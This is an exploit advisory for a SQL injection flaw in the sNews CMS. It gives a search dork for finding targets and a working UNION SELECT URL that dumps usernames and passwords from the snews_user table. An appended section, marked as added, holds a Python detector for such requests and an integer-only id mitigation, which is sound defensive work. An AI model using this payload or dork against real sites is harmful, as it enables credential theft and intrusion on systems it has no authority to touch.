Title: CMS snews SQL Injection Vulnerability
Author: By onestree
Download: http://snewscms.com/
Tested on: ubuntu 12.10 / win 7
Keyword: inurl:"tanyakan pada rumput yang bergoyang"

*************************************************************

SQL poc:

http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

Example:

http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*

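Detection sketch for the request shape above, added here as an example and not part of the original advisory: it flags shownews requests whose id is not a plain integer, after undoing URL encoding and the /**/ comment-as-whitespace trick. The sample request targets, function names and result labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed request targets for illustration (not taken from real logs).
SAMPLE_REQUESTS = [
    "/snews/snews.php?act=shownews&id=23",
    "/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1/*",
    "/snews/snews.php?act=shownews&id=23%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1",
    "/snews/snews.php?act=shownews&id=23'",
    "/snews/snews.php?act=listnews&page=2",
]

UNION_SELECT = re.compile(r"\bunion\b(\s+all\b)?\s+select\b")

def normalize(value):
    """Undo URL encoding and comment-as-whitespace tricks before matching."""
    previous = None
    while previous != value:                 # repeat to unwrap double encoding
        previous, value = value, unquote(value)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # /**/ between keywords
    value = re.sub(r"/\*.*$", " ", value, flags=re.S)     # unterminated trailing /*
    return re.sub(r"\s+", " ", value).strip().lower()

def classify(request_target):
    """Return 'ignore', 'ok', 'invalid-id' or 'sqli' for one request target."""
    parts = urlsplit(request_target)
    params = parse_qs(parts.query, keep_blank_values=True)
    if not parts.path.endswith("/snews.php") or params.get("act") != ["shownews"]:
        return "ignore"
    ids = params.get("id", [])
    if ids and all(re.fullmatch(r"[0-9]+", v) for v in ids):
        return "ok"                          # the only shape a news id should have
    if any(UNION_SELECT.search(normalize(v)) for v in ids):
        return "sqli"
    return "invalid-id"                      # non-numeric id: still worth logging

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(f"{classify(target):10} {target[:70]}")
```

The same integer-only rule is the server-side mitigation: reject or cast any id that is not purely numeric before it reaches the query.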
Thanks:

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
indonesiancoder - moeslimh4x0r - go-coder

spesial my hunny :*